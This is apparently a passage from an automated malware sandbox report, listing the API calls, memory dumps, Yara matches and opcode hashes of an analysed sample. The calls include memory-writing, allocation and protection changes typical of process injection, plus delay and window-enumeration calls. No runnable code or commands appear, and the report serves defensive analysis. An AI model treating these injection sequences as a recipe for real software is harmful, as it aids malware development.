                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                        • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBA
                        • CharNextA.USER32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCB
                        • lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                        Memory Dump Source
                        • Source File: 00000000.00000002.672645823.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.672641565.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672652442.0000000000408000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672656687.000000000040A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672661358.000000000040D000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672669296.000000000041A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672673110.000000000041E000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672681388.0000000000431000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672686997.0000000000440000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672691764.000000000044C000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: lstrlen$CharNextlstrcmpi
                        • String ID:
                        • API String ID: 190613189-0
                        • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                        • Instruction ID: bd09551308ad338638525116890fdadd4ab1f465f5503068af61de479685a4e4
                        • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                        • Instruction Fuzzy Hash: 34F0C231604418FFC7029BA5CD0099EBBA8EF06250B2140AAF840FB210D678DE019BA9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Executed Functions

                        APIs
                          • Part of subcall function 0816BA9A: LoadLibraryA.KERNELBASE(?,9F8AD7AF,66604E6B,08160D84,00000000), ref: 0816BC46
                        • NtWriteVirtualMemory.NTDLL(?,?,?,00000000,?,86EE73CD,?,86EE73C9), ref: 081689C6
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.788404453.0000000008160000.00000040.00000001.sdmp, Offset: 08160000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: LibraryLoadMemoryVirtualWrite
                        • String ID: QvH0$uw}$/|+
                        • API String ID: 3569954152-2929431466
                        • Opcode ID: aab6154cb99ec386dcb8b4163211e1ebf6b4dc090215d260034e2518c683a032
                        • Instruction ID: 9f37bf62851a4e9c77ca6a300fed08167104805a92bdda8b37f44ce70e7879c3
                        • Opcode Fuzzy Hash: aab6154cb99ec386dcb8b4163211e1ebf6b4dc090215d260034e2518c683a032
                        • Instruction Fuzzy Hash: AD620172508349DFDB749F28CD887EAB7A2FF54360F46862DDC899B204D3315AA1CB52
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.788404453.0000000008160000.00000040.00000001.sdmp, Offset: 08160000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: 5B!o$_hW=
                        • API String ID: 1029625771-889606190
                        • Opcode ID: bbd857194550494901491a1cf0b040162f86bb55cad4feeb67999d1c2383911c
                        • Instruction ID: 7cf3567be0f3804eb959024d76115516e2826a7561aa830cc5faae7e558efb89
                        • Opcode Fuzzy Hash: bbd857194550494901491a1cf0b040162f86bb55cad4feeb67999d1c2383911c
                        • Instruction Fuzzy Hash: B7C12671B08349DBDF388E29D8947EA73A6BF45361F46412EDC8E8B340D7325A61CB52
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                          • Part of subcall function 0816BA9A: LoadLibraryA.KERNELBASE(?,9F8AD7AF,66604E6B,08160D84,00000000), ref: 0816BC46
                        • NtAllocateVirtualMemory.NTDLL(-0000000112877372,?,B9AD2E6B), ref: 081698F6
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.788404453.0000000008160000.00000040.00000001.sdmp, Offset: 08160000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: AllocateLibraryLoadMemoryVirtual
                        • String ID: Axsf
                        • API String ID: 2616484454-4174198772
                        • Opcode ID: 3460ce78a11c78a6d4eaf6f496f57f1be929a25a2686d1f4115723a1beb52c84
                        • Instruction ID: acf9d78f9711c4fb86ffd2b70c918eb398670d47d4a96fe3ccc4bfebabaf4bd0
                        • Opcode Fuzzy Hash: 3460ce78a11c78a6d4eaf6f496f57f1be929a25a2686d1f4115723a1beb52c84
                        • Instruction Fuzzy Hash: 0F4123B6605289DFDB748F28CC447DA3BA1EF59360F46002ADC8DEB301D3758A66CB02
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000001.00000002.788404453.0000000008160000.00000040.00000001.sdmp, Offset: 08160000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5eb56e8fae4880f5bab7b58c15bc914797071d08c198598f8688052edcdbf270
                        • Instruction ID: f59be02c9aba23dd02db62702b2dbd6f4b222b3a7cf1b08cf7d3886a84603913
                        • Opcode Fuzzy Hash: 5eb56e8fae4880f5bab7b58c15bc914797071d08c198598f8688052edcdbf270
                        • Instruction Fuzzy Hash: DE71F575509344CFDB3C9E38E9953E937A1BF59362F42412ECC8A9B254CB318577CA02
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,9F8AD7AF,66604E6B,08160D84,00000000), ref: 0816BC46
                        Memory Dump Source
                        • Source File: 00000001.00000002.788404453.0000000008160000.00000040.00000001.sdmp, Offset: 08160000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 6f65fc3b73210cd141ee13079db1b2acd16271206b8d6f6a606431873228696b
                        • Instruction ID: 6e412e76a922696376a065927b007be93233af05898a0e45412e46163ed52dd1
                        • Opcode Fuzzy Hash: 6f65fc3b73210cd141ee13079db1b2acd16271206b8d6f6a606431873228696b
                        • Instruction Fuzzy Hash: 73313475619258DFCB38DE28C9846DA77A5BF09372F06446AEC99CB300D7359A30CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • CreateFileA.KERNELBASE(?,D63DFF8A,-A2527749), ref: 0816944B
                        Memory Dump Source
                        • Source File: 00000001.00000002.788404453.0000000008160000.00000040.00000001.sdmp, Offset: 08160000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        • Opcode ID: c81539d951fe42dcaf35c09619ff1e5fe6945d3875860ea55e33bb55a1988a7a
                        • Instruction ID: 5df247bce2835fc981f86807cb5a7be776b50dd0c68a755db1c75017c93eb73c
                        • Opcode Fuzzy Hash: c81539d951fe42dcaf35c09619ff1e5fe6945d3875860ea55e33bb55a1988a7a
                        • Instruction Fuzzy Hash: 8D118E72518291DFC7A86E35891ABAABBF1EF08350F87050EE8CAA7615C7700991CB46
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • NtProtectVirtualMemory.NTDLL(-B2C85624,9B2C7CA5,9B2C7CA9,?,9B2C7CAD,0816DD72), ref: 0816EB51
                        Memory Dump Source
                        • Source File: 00000001.00000002.788404453.0000000008160000.00000040.00000001.sdmp, Offset: 08160000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: MemoryProtectVirtual
                        • String ID:
                        • API String ID: 2706961497-0
                        • Opcode ID: b74b2585cb70f0bacdae00a6d49eb395e929a9db8d68cddd9f43f0ad03087176
                        • Instruction ID: 6c3b3bacd1197bac1559d7df5c5d2bc9cb7b809091f94227919bf96d9088215a
                        • Opcode Fuzzy Hash: b74b2585cb70f0bacdae00a6d49eb395e929a9db8d68cddd9f43f0ad03087176
                        • Instruction Fuzzy Hash: 5A0131B16045899FDF74CE2CCC88ADA77AAEBD8201F55812A9C4D9B305C6319F41D615
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000001.00000002.788404453.0000000008160000.00000040.00000001.sdmp, Offset: 08160000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 94b3fbeb3da193ff63bcc95ae74d2264c2b48530d37196e452664ac37291a10f
                        • Instruction ID: 1f925ee0fb8ccaf491ef2893b50b13afbc25a1ef71644f85df53570202460875
                        • Opcode Fuzzy Hash: 94b3fbeb3da193ff63bcc95ae74d2264c2b48530d37196e452664ac37291a10f
                        • Instruction Fuzzy Hash: 22E02672594081CBCA567928D860ADE7E66AF82277F46C00AC4C19B005CB3AC032AFC1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.787475868.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.787463347.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.787503028.000000000041B000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.787513351.000000000041D000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.787852385.000000000629F000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: #100
                        • String ID: VB5!6&*
                        • API String ID: 1341478452-3593831657
                        • Opcode ID: b45f64b1dd7241796e69c02c8ae2b6b7b1fda0450ebcce9396f2c0466931170b
                        • Instruction ID: 354062a9623a66690304ac102293e66bea99b748d7d0f0bae02a1ef6577a8fe8
                        • Opcode Fuzzy Hash: b45f64b1dd7241796e69c02c8ae2b6b7b1fda0450ebcce9396f2c0466931170b
                        • Instruction Fuzzy Hash: 94D0A44168F3C00FE313637108221156FB00D1369631B09EBD0C1DA8E3906C1809C326
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • EnumWindows.USER32(CFDFE74F,?,00000000), ref: 08160E44
                        Memory Dump Source
                        • Source File: 00000001.00000002.788404453.0000000008160000.00000040.00000001.sdmp, Offset: 08160000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: EnumWindows
                        • String ID:
                        • API String ID: 1129996299-0
                        • Opcode ID: d31664821f8f62feb34c63e50257379d84ca14d96018ed9649bf0972c2a7ce2c
                        • Instruction ID: 7429526bf22284d5ad59854b5a4f5999a995fc83a0a5ce134ad0de10e873184f
                        • Opcode Fuzzy Hash: d31664821f8f62feb34c63e50257379d84ca14d96018ed9649bf0972c2a7ce2c
                        • Instruction Fuzzy Hash: C841BB36805688CFD729DF74C8106D67BE5EF85221F3549AED8C4EBA02D3329876CB51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000001.00000002.788404453.0000000008160000.00000040.00000001.sdmp, Offset: 08160000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1bb7131482ef691d907a20a90a2761f9cd05e96694f77ff5b5e4ff40a13d6a69
                        • Instruction ID: b2e39bde23b1c3392b1f5f244f2515a61be600c2943840bdb966c40d22ecad3c
                        • Opcode Fuzzy Hash: 1bb7131482ef691d907a20a90a2761f9cd05e96694f77ff5b5e4ff40a13d6a69
                        • Instruction Fuzzy Hash: 6331C37460D299DBCF399E248C407EA3B64BF49332F0A4026DC99CB341D7768A71CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000001.00000002.788404453.0000000008160000.00000040.00000001.sdmp, Offset: 08160000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 313f8b86a76304399515e917fdffcbf46a324ae7b33f4267de7e0da3e7c575f9
                        • Instruction ID: e17b6ec8f24a5809e5571eef1659344070b8423592cee3107368556a7ff3ed42
                        • Opcode Fuzzy Hash: 313f8b86a76304399515e917fdffcbf46a324ae7b33f4267de7e0da3e7c575f9
                        • Instruction Fuzzy Hash: 8B01497540C340CFC758AF24D49129AFBA2BF11325F56485DD9C58F612D7B54470CB52
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000001.00000002.788404453.0000000008160000.00000040.00000001.sdmp, Offset: 08160000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5d5226bf07e15be8792e94b4b6e3e44fd2038d9d81ac8b1b166b312a26a5965f
                        • Instruction ID: 4a4f82757392bb3394d15474a69abaad0565a0cb1f25a957ef75618933044965
                        • Opcode Fuzzy Hash: 5d5226bf07e15be8792e94b4b6e3e44fd2038d9d81ac8b1b166b312a26a5965f
                        • Instruction Fuzzy Hash: 88F02876544858CFEB60DA656550BD677E0DF88233B15046AC489E7A00C331D5B2CB61
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • EnumWindows.USER32(CFDFE74F,?,00000000), ref: 08160E44
                        Memory Dump Source
                        • Source File: 00000001.00000002.788404453.0000000008160000.00000040.00000001.sdmp, Offset: 08160000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: EnumWindows
                        • String ID:
                        • API String ID: 1129996299-0
                        • Opcode ID: c5c375d825420ae49d5113d21f401c55ed2bf9bb87bf98a12b6dd247f03c6f94
                        • Instruction ID: 659af815d58a3e8f5b1a44c7971c78b92370332904c29296b023cc73a45ce801
                        • Opcode Fuzzy Hash: c5c375d825420ae49d5113d21f401c55ed2bf9bb87bf98a12b6dd247f03c6f94
                        • Instruction Fuzzy Hash: AF01787654458CCFEB21CE306410BD63BF0EF09222F1504A6C8C9D7A01C331DA72CB21
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,9F8AD7AF,66604E6B,08160D84,00000000), ref: 0816BC46
                        Memory Dump Source
                        • Source File: 00000001.00000002.788404453.0000000008160000.00000040.00000001.sdmp, Offset: 08160000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: cb4d7b187629fe5b1acb52fcfaa64ba56463154012c85948707a43be72c13c43
                        • Instruction ID: 7d70a1912098154855cbd8a42077f727a005706a3ca6b33750fe4eb85208edf3
                        • Opcode Fuzzy Hash: cb4d7b187629fe5b1acb52fcfaa64ba56463154012c85948707a43be72c13c43
                        • Instruction Fuzzy Hash: 3A017535A1D2599BDF38AE1488006EA36A4BF05372F064417DC99D7200DF765B30CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.788404453.0000000008160000.00000040.00000001.sdmp, Offset: 08160000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: LibraryLoadMemoryProtectVirtual
                        • String ID: ><|
                        • API String ID: 3389902171-3199821574
                        • Opcode ID: 80f7248ccfa641390ce2b1b1fcba809fac29e9ed4608b5b44dbe7cef0cd97a16
                        • Instruction ID: 6543e867868578b5d95ea31780fc93f799859f0337abd7781d25593045e90908
                        • Opcode Fuzzy Hash: 80f7248ccfa641390ce2b1b1fcba809fac29e9ed4608b5b44dbe7cef0cd97a16
                        • Instruction Fuzzy Hash: A122F6755083C5CECB35CF38C8987DA7BA1AF16321F59829EC8DA8F296D3358516C722
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000001.00000002.788404453.0000000008160000.00000040.00000001.sdmp, Offset: 08160000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c109572e380f57bd036b68edad6c46961452057f15c505fa7ae24d9bac4e1dec
                        • Instruction ID: 11a2825595bb83366a001b87ee1c425d2bc7817388353e8ab5991782ed435f59
                        • Opcode Fuzzy Hash: c109572e380f57bd036b68edad6c46961452057f15c505fa7ae24d9bac4e1dec
                        • Instruction Fuzzy Hash: CFB092B62419809FEF02CA08C482B4073B1F705684B4804D0E002CB752C228ED01CA00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000001.00000002.788404453.0000000008160000.00000040.00000001.sdmp, Offset: 08160000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 174fd03130ee702f3bbe00a53dc2a6e305dd0cc3a773c9e59be64824dddbc709
                        • Instruction ID: 4b6f9c82d33d273c7a412d2812d78931f603be84eacd94716cbc4d574a63649e
                        • Opcode Fuzzy Hash: 174fd03130ee702f3bbe00a53dc2a6e305dd0cc3a773c9e59be64824dddbc709
                        • Instruction Fuzzy Hash: 56B09234211A408FCA45CA18C280F4073B0BF28BA0F071890E841C7B51C324E810C910
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Executed Functions

                        APIs
                        • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 0056FDDE
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.890432829.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                        Similarity
                        • API ID: MemoryProtectVirtual
                        • String ID: DTr$rTW
                        • API String ID: 2706961497-2667492626
                        • Opcode ID: ef34c133e6778a327d4ffe671f9b170c7cd67dbd85605f22ae67a3facabaf6b6
                        • Instruction ID: a20e2257d5c7fca6349beda29d8f290ba634261b2edf508a4c10051ab7fb944e
                        • Opcode Fuzzy Hash: ef34c133e6778a327d4ffe671f9b170c7cd67dbd85605f22ae67a3facabaf6b6
                        • Instruction Fuzzy Hash: 8D11C2B29043019FC7548B14E98AF667EA8FF69364B2546B2ED46CB2B3D334DC428715
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 0056FDDE
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.890432829.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                        Similarity
                        • API ID: MemoryProtectVirtual
                        • String ID: DTr$rTW
                        • API String ID: 2706961497-2667492626
                        • Opcode ID: 4f1ffa47055560a388a6519171f210aa1cdca3a4224fb6a7729a93bd913164bc
                        • Instruction ID: e79d831a36dcc9b9ffd2bb3f80672cb03e2b8c62668d6df1d1da3cfcc5984022
                        • Opcode Fuzzy Hash: 4f1ffa47055560a388a6519171f210aa1cdca3a4224fb6a7729a93bd913164bc
                        • Instruction Fuzzy Hash: 3611E5B28093429FD7409B24AD96B567F64FF553647254BE7EC928B1E3C320C8028715
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 0056FDDE
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.890432829.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                        Similarity
                        • API ID: MemoryProtectVirtual
                        • String ID: DTr$rTW
                        • API String ID: 2706961497-2667492626
                        • Opcode ID: 17aceb0750e7c113fe78a3b7603247cd9106acad4c3505d4929392537d4b5357
                        • Instruction ID: 793a6e0ed176adb9798eaad768c497c8d01528d08f4fd5f804d140eb74bcbe37
                        • Opcode Fuzzy Hash: 17aceb0750e7c113fe78a3b7603247cd9106acad4c3505d4929392537d4b5357
                        • Instruction Fuzzy Hash: E81104B18043019FC7448B14E88AF663E68FF69364B2146F2ED828B2B3C320DC428B11
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 0056FDDE
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.890432829.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                        Similarity
                        • API ID: MemoryProtectVirtual
                        • String ID: DTr$rTW
                        • API String ID: 2706961497-2667492626
                        • Opcode ID: 2eece0a2657e87383551c0a13835e00cacb4fe63e0a8348eee19ad41a65f3dc9
                        • Instruction ID: 364c96a450d01a49be7cc32e669253b7fcf58ccd95096ddef496c52ff1f4eb87
                        • Opcode Fuzzy Hash: 2eece0a2657e87383551c0a13835e00cacb4fe63e0a8348eee19ad41a65f3dc9
                        • Instruction Fuzzy Hash: A30128B28083019FD3549B14AD8AFA66FA4FF583643254BA6ED83CB1A3C324C8028715
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 0056FDDE
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.890432829.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                        Similarity
                        • API ID: MemoryProtectVirtual
                        • String ID: DTr$rTW
                        • API String ID: 2706961497-2667492626
                        • Opcode ID: 28abc68f63cfc5228daafcd7622e3bc2c89061b19b246be448413cfae8415542
                        • Instruction ID: 5baa60258b1e964ccce7675db50140f729cd7e794c4fe1d93e9c4cf36836dca5
                        • Opcode Fuzzy Hash: 28abc68f63cfc5228daafcd7622e3bc2c89061b19b246be448413cfae8415542
                        • Instruction Fuzzy Hash: 66F028B28483008FD3508B04AD46BA37FB4FF697647250BE6DD86CB1A2D324D8019715
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.890432829.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                        Similarity
                        • API ID: Sleep
                        • String ID: xAF8
                        • API String ID: 3472027048-1891033221
                        • Opcode ID: 4d6af60476efd923a7a07de6958b0d3978eb881ef28debaef6e4dea0182c61ef
                        • Instruction ID: c17a077bc3f09b15654432d6f01f34c1bc97012227c923d8494ad30fe802c386
                        • Opcode Fuzzy Hash: 4d6af60476efd923a7a07de6958b0d3978eb881ef28debaef6e4dea0182c61ef
                        • Instruction Fuzzy Hash: EA01B1B0848341DFEB809F20E80DB99BF64BF143A5F158095E9214B0B2D3BACD80CF51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 0056FDDE
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.890432829.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                        Similarity
                        • API ID: MemoryProtectVirtual
                        • String ID: DTr$rTW
                        • API String ID: 2706961497-2667492626
                        • Opcode ID: ab8bb9ff683d4ef2c8e0dcf84aaead247e1f0f7443c7572a7237c838a06e51e3
                        • Instruction ID: 2bb828fa5eeff1aba84056ad7c2d4a2677d09f9ed2b5dbacc7f8ffcf700060bb
                        • Opcode Fuzzy Hash: ab8bb9ff683d4ef2c8e0dcf84aaead247e1f0f7443c7572a7237c838a06e51e3
                        • Instruction Fuzzy Hash: 0FF0E2F68043109FC7548B04AE56BA77F64FF697A43294BEADC87CB0A2D320C8028610
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 0056FDDE
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.890432829.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                        Similarity
                        • API ID: MemoryProtectVirtual
                        • String ID: DTr$rTW
                        • API String ID: 2706961497-2667492626
                        • Opcode ID: fe73bc0106f67ece62dbae5153d63c4cfaba1ad0686373e71446aa9b4c87dde9
                        • Instruction ID: 738a787675d941e59eac324b9027989049b69c1a10c05ffb918e870fa93acca6
                        • Opcode Fuzzy Hash: fe73bc0106f67ece62dbae5153d63c4cfaba1ad0686373e71446aa9b4c87dde9
                        • Instruction Fuzzy Hash: 6EF02EB28043109FD3549B049946BE3BFA4FF297A43254BE69C87C71A2D714D4029610
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 0056FDDE
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.890432829.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                        Similarity
                        • API ID: MemoryProtectVirtual
                        • String ID: DTr$rTW
                        • API String ID: 2706961497-2667492626
                        • Opcode ID: 4e15bfd609cb91126a341290ba6f0be14639dc55cfcbae82d5ad013b17c99fee
                        • Instruction ID: b51f1c6f9e9430007d13e6312f833da18bb9e1538a3d57e9b6651ea72cf60485
                        • Opcode Fuzzy Hash: 4e15bfd609cb91126a341290ba6f0be14639dc55cfcbae82d5ad013b17c99fee
                        • Instruction Fuzzy Hash: 34E02BF28443108FD3044B149D56BA37EA5FF3936433547E69C87CB1B2D724C4029601
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • Sleep.KERNEL32(00000005), ref: 0056FEDA
                        • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 0056FF56
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.890432829.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                        Similarity
                        • API ID: MemoryProtectSleepVirtual
                        • String ID: xAF8
                        • API String ID: 3235210055-1891033221
                        • Opcode ID: 0c13c5b44a895df0c3b7b187716486bc884fa5a4d7a4d0f59d47d52d6e49f683
                        • Instruction ID: 0a91046ee2f47cfe271da832f5abd90db01c67a2cdbea36857632c3b541b4bef
                        • Opcode Fuzzy Hash: 0c13c5b44a895df0c3b7b187716486bc884fa5a4d7a4d0f59d47d52d6e49f683
                        • Instruction Fuzzy Hash: 68E06530845781DFD7849F66E00E389FFA0BF107A1B06C09CA8628B0B2A379CA40DF02
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 0056FF56
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.890432829.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                        Similarity
                        • API ID: MemoryProtectVirtual
                        • String ID: xAF8
                        • API String ID: 2706961497-1891033221
                        • Opcode ID: 0a465334489a8019e758ae86a1ed5cdfb1ce87e709afdc7e9bdaa20479f08052
                        • Instruction ID: 0101593b4ccb8acd21a1ed94afa8283710086ef45942e35bac69cb4260579a43
                        • Opcode Fuzzy Hash: 0a465334489a8019e758ae86a1ed5cdfb1ce87e709afdc7e9bdaa20479f08052
                        • Instruction Fuzzy Hash: 63F0A0B18093409FDB828B29E80C389BF60BF163B07164195E4618B0F1D3B8CA45CF51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 0056FF56
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.890432829.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                        Similarity
                        • API ID: MemoryProtectVirtual
                        • String ID: xAF8
                        • API String ID: 2706961497-1891033221
                        • Opcode ID: b3538d73e2f9db29c438e2f52fe24667af235f09af3b242b55b936588ffbeb1c
                        • Instruction ID: ea0ff0e43b48d3df91ec9930d52a86ce40dbc9f903ecef361cf395bd1aeb43f4
                        • Opcode Fuzzy Hash: b3538d73e2f9db29c438e2f52fe24667af235f09af3b242b55b936588ffbeb1c
                        • Instruction Fuzzy Hash: E2F0E5B1840341DFEB814E24E80C7E9BBA4BF253F5F614048A8618B0F5E3B8CA80CF52
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 0056FDDE
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.890432829.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                        Similarity
                        • API ID: MemoryProtectVirtual
                        • String ID: DTr
                        • API String ID: 2706961497-1505137188
                        • Opcode ID: c01eb03db621fce8b50e52747dbbfa23ce04a921bf8bb93fcab5c7cb04185024
                        • Instruction ID: 4d46ce8067c0189567aa24eba6a6c4c52e933f9b77ec706bd6dab9e139ca0179
                        • Opcode Fuzzy Hash: c01eb03db621fce8b50e52747dbbfa23ce04a921bf8bb93fcab5c7cb04185024
                        • Instruction Fuzzy Hash: CED02BB24453114BC24455146D19BF79A85BE617653744B22AD92C70F1D700C813D200
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 0056FF56
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.890432829.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                        Similarity
                        • API ID: MemoryProtectVirtual
                        • String ID: xAF8
                        • API String ID: 2706961497-1891033221
                        • Opcode ID: 832615ef9804210029d116db4bcbfb057222643613e05fc4900fae458ffca591
                        • Instruction ID: 22832767bb30f9ae7d9b739e90bb3b1332f703c855aa7d6b60b9ebc6e921aed6
